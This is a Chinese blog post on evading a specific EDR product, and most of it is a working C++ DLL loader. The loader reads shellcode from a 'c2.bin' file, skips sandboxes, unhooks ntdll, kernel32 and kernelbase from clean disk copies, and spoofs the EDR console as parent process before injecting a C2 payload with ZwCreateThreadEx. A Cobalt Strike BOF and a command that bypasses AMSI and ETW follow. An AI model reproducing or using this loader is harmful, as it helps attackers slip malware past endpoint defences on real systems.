免杀实战-EDR对抗

最新推荐文章于 2024-06-17 11:17:53 发布
最新推荐文章于 2024-06-17 11:17:53 发布
阅读量594 收藏 1
点赞数 3
分类专栏: # 渗透测试 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/136331571
版权

文章目录

杀软分析

x64dgb简单调试发现该edr在r3环对ntdll.dll和kernel32.dll关键函数均存在hook,这里硬盘读取原来的dll进行重新加载,原理如图

在这里插入图片描述

loader

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>
#include <TlHelp32.h>
#include<stdlib.h>
#include<iostream>
#include <psapi.h>

BOOL  EnableDebugPrivilege()
{
	HANDLE token_handle;
	LUID luid;
	TOKEN_PRIVILEGES tkp;
	//打开访问令牌
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle))
	{
		return   FALSE;
	}
	//查询luid
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
	{
		CloseHandle(token_handle);
		return   FALSE;
	}
	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = luid;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	//调整访问令牌权限
	if (!AdjustTokenPrivileges(token_handle, FALSE, &tkp, sizeof(tkp), NULL, NULL))
	{
		CloseHandle(token_handle);
		return   FALSE;
	}
	return TRUE;
}

typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
	PHANDLE ThreadHandle,
	ACCESS_MASK DesiredAccess,
	LPVOID ObjectAttributes,
	HANDLE ProcessHandle,
	LPTHREAD_START_ROUTINE lpStartAddress,
	LPVOID lpParameter,
	ULONG CreateThreadFlags,
	SIZE_T ZeroBits,
	SIZE_T StackSize,
	SIZE_T MaximumStackSize,
	LPVOID pUnkown
	);
typedef FARPROC
(WINAPI
	* pGetProcAddress)(
		_In_ HMODULE hModule,
		_In_ LPCSTR lpProcName
		);
typedef HMODULE
(WINAPI
	* pLoadLibraryA)(
		_In_ LPCSTR lpLibFileName
		);

int ppidfunc(DWORD pid, LPVOID lpBuffer, DWORD dwFileSize) {
	PROCESS_INFORMATION pi = { 0 };
	STARTUPINFOEXA si = { 0 };
	SIZE_T sizeToAllocate;
	si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
	//getparenthandle
	HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
	//UpdateProcThreadAttribute
	InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);
	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
	UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
	//CreateProcess
	CreateProcessA(NULL, (LPSTR)"notepad.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
	LPVOID lpBaseAddress = VirtualAllocEx(pi.hProcess, NULL, dwFileSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)lpBuffer, dwFileSize, NULL);
	HANDLE hRemoteThread = NULL;
	DWORD ZwRet = 0;
	HMODULE hNtdll = LoadLibrary(L"ntdll.dll");
	typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");
	ZwRet = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, pi.hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, 0, 0, 0, NULL);
	WaitForSingleObject(hRemoteThread, INFINITE);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	CloseHandle(parentProcessHandle);
	return 0;
}
BOOL box()
{
	MEMORYSTATUSEX memoryStatus;
	memoryStatus.dwLength = sizeof(MEMORYSTATUSEX);
	GlobalMemoryStatusEx(&memoryStatus);
	DWORDLONG RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024 / 1024;  //内存RAMMB(G)
	if (RAMMB > 2)
	{
		SYSTEM_INFO systemInfo;
		GetSystemInfo(&systemInfo);
		DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;
		if (numberOfProcessors > 4)
		return FALSE;
	}
	else
	return TRUE;
}
BOOL  isPrime(long long number) {
	if (number <= 1)
		return FALSE;
	int i = 2;
	for (; i <= number; ++i) {
		if (number % i == 0) {
			return FALSE;
		}
	}
	return TRUE;
}

DWORD UNHOOKntdll(char* dllname) {
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA(dllname);

	GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));
	char nn[100] = { 0 };
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;//mi.lpBaseOfDll=ntdllModule
	sprintf_s(nn, "c:\\windows\\system32\\%s", dllname);
	HANDLE ntdllFile = CreateFileA((LPCSTR)nn, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}

	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);
	FreeLibrary(ntdllModule);

	return 0;
}
DWORD FindProcPid() {
	HANDLE hProcessSnap = NULL;
	BOOL bRet = FALSE;
	PROCESSENTRY32 pe32 = { 0 };
	DWORD dwProcessId = 0;
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
	pe32.dwSize = sizeof(PROCESSENTRY32);
	if (hProcessSnap != INVALID_HANDLE_VALUE) {
		bRet = Process32First(hProcessSnap, &pe32);
		while (bRet) {
			if (!_wcsicmp(pe32.szExeFile, L"EPConsole.exe")) {
				dwProcessId = pe32.th32ProcessID;
				break;
			}
			bRet = Process32Next(hProcessSnap, &pe32);
		}
	}
	return dwProcessId;
}
int killme()
{
	char g_TargetFile[] = "c2.bin";
	//打开文件
	HANDLE hFile = CreateFileA((LPCSTR)g_TargetFile, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);
	//获取文件大小
	DWORD dwFileSize = GetFileSize(hFile, NULL);
	//申请一块内存空间
	PVOID lpBuffer = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	//将内存读取到申请的内存空间
	DWORD dwReadLength = 0;
	ReadFile(hFile, lpBuffer, dwFileSize, &dwReadLength, NULL);
	//关闭文件
	CloseHandle(hFile);
	if (box()) {
		isPrime(1000000000000000003);
	}
	else {
		DWORD pid = FindProcPid();

		UNHOOKntdll((char*)"ntdll.dll");
		UNHOOKntdll((char*)"kernel32.dll");
		UNHOOKntdll((char*)"kernelbase.dll");
		//EnableDebugPrivilege();//对于获取system权限的进程而言需要管理员权限启动
		ppidfunc(pid, lpBuffer, dwFileSize);
	}
	return 0;
}
extern "C" _declspec(dllexport) void test()
{
	killme();
}

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

这里伪造成杀软的子进程形成父进程信任链,通过ZwCreateThreadEx对子进程注入上线

通过白名单+伪签名的黑dll上线,发现执行命令就死,猜测应该是cs的shell功能触发了edr的启发式导致被杀

BOF

这里通过BOF执行命令

#include "bofdefs.h"

extern "C" {
    void go(char* buff, int len) {
        
		DFR_LOCAL(KERNEL32, CreateToolhelp32Snapshot);
		DFR_LOCAL(KERNEL32, Process32First);
		DFR_LOCAL(KERNEL32, Process32Next);
		DFR_LOCAL(KERNEL32, CloseHandle);


        //add ...
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
		if (hProcessSnap == INVALID_HANDLE_VALUE)
		{
			BeaconPrintf(CALLBACK_OUTPUT," CreateToolhelp32Snapshot调用失败! \n");
			return;
		}
		BOOL bMore = Process32First(hProcessSnap, &pe32);
		while (bMore)
		{
			BeaconPrintf(CALLBACK_OUTPUT, "Process Name is : %s\t", pe32.szExeFile);
			BeaconPrintf(CALLBACK_OUTPUT, "Process ID is: % d \n", pe32.th32ProcessID);
			bMore = Process32Next(hProcessSnap, &pe32);
		}
		CloseHandle(hProcessSnap);
    }

}
#ifndef BOF
void main(int argc, char* argv[]) {
    go(NULL, 0);
}

#endif

inline-execute a.obj

在这里插入图片描述

.NET

发现还可以内存加载.NET,需要bypass etw和amsi

using System;
using System.Runtime.InteropServices;
namespace coleak
{
    class winfun
    {
        [DllImport("User32.dll")]
        public static extern int MessageBox(IntPtr h, string m, string c, uint type);
        [DllImport("kernel32.dll", EntryPoint = "Beep")]
        public static extern bool mymethod(uint frequency, uint duration);
    }
    class Program
    {
        static void Main(string[] args)
        {
            winfun winfun = new winfun();
            winfun.MessageBox((IntPtr)0, "yueyy", "coleak", (uint)0);
            Random random = new Random();
            for (int i = 0; i < 10000; i++)
            {
                winfun.mymethod((uint)random.Next(10000), 100);
            }
            Console.ReadLine();
        }
    }
}

inlineExecute-Assembly --dotnetassembly test.exe  --amsi --etw --appdomain forRealLegit --mailslot forRealLegit
coleak
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队攻防渗透技术实战流程:红队目标上线之Webshell免杀对抗
HACKONE的博客
05-27 279
上面的实验代表了webshell查杀的几个特征:表面代码只能解决代码表面的查杀操作行为哥斯拉执行命令无提示antsword执行命分有提示哥斯拉执行命令无提示但是执行net user 有提示antsword执行命分有提示工具指纹源码魔改(指纹打乱,调用逻辑(行为绕过))对抗:流量产品 和 杀毒产品换冷内工具(自己写的工具)让产品没来得及集成这个工具的检测导致绕过(特征库)
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 952
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
网络靶场实战-杀软EDR对抗-脱钩
蛇矛实验室
04-25 1014
一般的杀毒软件会在我们进程启动的时候注入DLL到进程中,然后对系统函数进行Hook(挂钩).从而拦截我们进程的执行流程,当然这个流程只针对于未被添加到白名单的程序.我们来看下效果图.这里我设置了白名单为apps目录,在次目录下不会被检测.我们运行一个系统自带的软件Notepad来看下效果.首先X64dbg附加进程我们随便搜索一个函数看看是否被HOOK。
【渗透实战】木马免杀
zkaqlaoniao的博客
11-14 1370
base64 sgn编码。
红蓝对抗总结-蓝队
武天旭的博客
07-01 1440
复盘总结红蓝对抗结束后,应对各阶段进行充分、全面的复盘分析,提出整改措施。一般须遵循遗留最小风险和问题相对清零的原则持续优化防守策略,对不足之处进行整改,进而逐步提升防守水平。总结涉及以下方面:工作方案、组织管理、工作启动会、系统资产梳理、安全自查及优化、基础安全监测与防护设备的部署、安全意识、应急预案、注意事项、队伍协同、情报共享和使用、反制战术、防守作战指挥策略等。
AV/EDR 免杀逃避技术汇总
jentle8的博客
09-08 1942
EDR AV 逃避和免杀方案汇总
网络靶场实战-安全开发之直接系统调用
蛇矛实验室
12-13 522
熟悉 Windows 编程的人应该知道,Native API 一般是不直接对外公开的,它通常作为操作系统内部的一个组件,并且只能由操作系统内部的组件或应用程序调用,所以在使用一些未文档的化的 Native API 时,需要通过网上公开的资料或者通过逆向取获取其函数原型和相关参数。在安全研发的过程中,难免会遇到在用户模式对抗 AV/EDR 的挂钩,应对的方法有很多,比如可以使用直接系统调用,还可以将杀软的所挂的钩子解除,还有一种就是寻找具有相同功能未被挂钩的 API。
推荐开源项目:EDR-Bypass-Demo
gitblog_00058的博客
06-07 273
推荐开源项目:EDR-Bypass-Demo 在这个网络安全日益重要的时代,了解和掌握如何绕过Endpoint Detection and Response (EDR) 和 Anti-Virus (AV) 工具显得尤为重要。EDR-Bypass-demo 是一个由78itsT3@m创建的开源项目,它提供了一系列的示例代码,旨在教授红队基础免杀技巧。这个项目不仅适合安全研究人员学习,也是软件开发者增...
深信服PT1-EDR题库
06-04
深信服认证PT1-EDR题库,亲测可过
深信服PT1-EDR.docx
04-25
深信服PT1-EDR.docx
如何绕过EDR挂钩检测 杀软EDR对抗-脱钩
10-31
如何绕过EDR挂钩检测 杀软EDR对抗-脱钩
“三法净水”与JR-EDR技术处理焦化循环水
05-25
中煤九鑫焦化有限责任公司现有电厂循环水、化产循环水及化产低温循环水3个循环水场,产生污水70 m3/h,为节水减排,采用"三法净水"专利技术与JR-EDR(新型频繁倒极电渗析)技术组合工艺对污水进行处理回用。与传统的混凝...
戎码翼龙NG-EDR白皮书
06-12
它,就是戎码翼龙AI原生NG-EDR!凭借其原生的人工智能技术和新一代架构设计(云原生架构搭载内核级轻量传感器),塑造了具有突破性的终端安全解决方案,有效解决了终端安全的两大难题--传统终端传感器卡机、海量告警...
JAVA 替代SWITCH 枚举值 CASE 的 策略模式
chengmin123456789的博客
06-17 199
在java 中实际开发功能时候,我想绝大多数人应该是倾向于使用case when 的,而设计模式大部分用于架构层,至于该怎么用,我觉得还是黑猫白猫都行。
Java学习-MyBatis学习(五)
丢爸
06-13 889
【代码】Java学习-MyBatis学习(五)
Vue 简单自定义标签
weixin_44167504的博客
06-13 309
思路:1、计算每个项离父级左侧宽 left2、计算当前滑块的宽,绝对定位3、下一个项的宽/2-滑块的宽/2+下一项离父级左侧的宽 left。
数据结构笔记-2、线性表
qq_66013948的博客
06-12 932
​ 线性表是具有相同数据类型的 n (n>=0) 个数据元素的有限序列,其中 n 为表长,当 n = 0 时线性表是一个空表。La1a2a3aixi1anLa1​a2​a3​...ai​xi1​...an​式中,a1a_1a1​是唯一的“第一个元素”,又称表头元素;ana_nan​是唯一的“最后一个元素”,又称表尾元素。除第一个元素外,每个元素有且仅有一个直接前驱。
LinkedHashMap详解
最新发布
落日的博客
06-17 301
LinkedHashMap 是 HashMap 的子类,与 HashMap 类似,它也基于哈希表来存储键值对。但是,LinkedHashMap 维护了一个双向链表来记录插入顺序或者访问顺序,因此具备一些特有的特性和功能。双向链表在LinkedList详解这篇文章中有介绍。LinkedHashMap 中使用双向链表维护顺序的图示:绿色连线表示 双向链表的 pre和next指针。
adb shell dumpsys SurfaceFlinger --dps edr log 20
06-13
这个命令的含义是获取SurfaceFlinger的dps、edr、log信息,并且只显示最新的20条log。 具体解释如下: 1. adb shell:表示通过adb连接到Android设备的shell命令行界面。 2. dumpsys:是Android系统的一个工具,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值